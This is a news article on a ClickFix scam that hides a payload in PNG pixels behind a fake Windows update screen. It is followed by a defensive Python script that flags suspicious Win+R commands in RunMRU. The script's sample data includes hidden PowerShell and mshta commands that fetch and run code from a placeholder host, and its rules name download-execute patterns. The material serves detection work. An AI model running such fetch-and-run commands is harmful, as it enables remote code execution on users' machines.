A New PNG Image Scam: Hackers Steal Users’ Data Through Hidden Code

Scammers constantly invent new techniques to steal users' data. One of the most common tricks is a fake link offering a prize or service. The newest method, however, involves stealing data through a PNG image.

When a user clicks on a PNG image containing hidden data, spyware tools are automatically activated, enabling the theft of passwords, bank account information, and cryptocurrency wallets. Researchers at Huntress uncovered this new scam technique, in which hackers deceive users by exploiting Windows. But how? Here are the details.

A New Trick That Steals Users’ Data

According to Huntress, ClickFix scammers embedded malicious code directly into the pixel data of PNG images, relying on specific color channels to reconstruct and decrypt the payload in memory—rather than the traditional method of adding malicious data to a file.

The scammers then used a fake, highly convincing Windows update screen that imitates the latest full-screen blue Windows update interface. It displays realistic animations titled “Working on updates,” eventually leading the user to follow the usual ClickFix routine:

  • Open the Run window using Win + R

  • Paste a malicious command

  • Execute it

Once the user does this, they fall victim to a data‑stealing scheme targeting personal data, banking information, and passwords.

How Malicious Sites Are Identified

Huntress researchers explained that this trick often appears as ads on web pages or as age‑verification pop-ups. Once the user clicks, the fake Windows update screen appears. Following the instructions, especially pressing Win + R and executing the command, allows hackers to access the device's data effortlessly.

Meanwhile, the scam uses obfuscated PowerShell code to disable security tools and prevent the attack from being detected.
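For defenders, the Win + R step described above leaves a trace: Windows records each command typed into the Run dialog in the current user's RunMRU registry key. The following Python triage script is an added example, not code from Huntress or from the original article; its function names, heuristics and sample values are assumptions constructed for illustration.

```python
import re

# Commands typed into the Win + R dialog are stored per user under this key,
# one value per command, each ending in the two characters "\1".
RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics are assumptions made for this example, not published indicators.
RULES = {
    "interpreter": re.compile(
        r"\b(powershell|pwsh|mshta|wscript|cscript|cmd|rundll32|regsvr32|"
        r"msiexec|curl|certutil|bitsadmin)(\.exe)?\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(
        r"\s-(w|win|windowstyle)\s+h(idden)?\b|"
        r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_exec": re.compile(
        r"\b(iex|irm|iwr|invoke-\w+|downloadstring)\b", re.I),
}

def read_runmru():
    """Return {value_name: command} for the current user (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY) as key:
        count = winreg.QueryInfoKey(key)[1]
        rows = [winreg.EnumValue(key, i) for i in range(count)]
    return {name: data for name, data, _ in rows if name != "MRUList"}

def triage(entries):
    """Flag entries that start an interpreter AND fetch, hide or encode."""
    findings = []
    for name, data in entries.items():
        if name == "MRUList":          # ordering string, not a command
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        hits = sorted(k for k, rx in RULES.items() if rx.search(cmd))
        if "interpreter" in hits and len(hits) > 1:
            findings.append((name, cmd, hits))
    return findings

# Constructed sample values; the host name is a placeholder.
SAMPLE = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta http://update.example.invalid/x\\1",
    "d": 'powershell -w hidden -c "irm http://update.example.invalid/a | iex"\\1',
}
```

On a Windows host, `triage(read_runmru())` applies the same rules to the logged-in user's real Run history; a bare `cmd` or `notepad` entry is not flagged because it matches no rule beyond the interpreter name.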

 
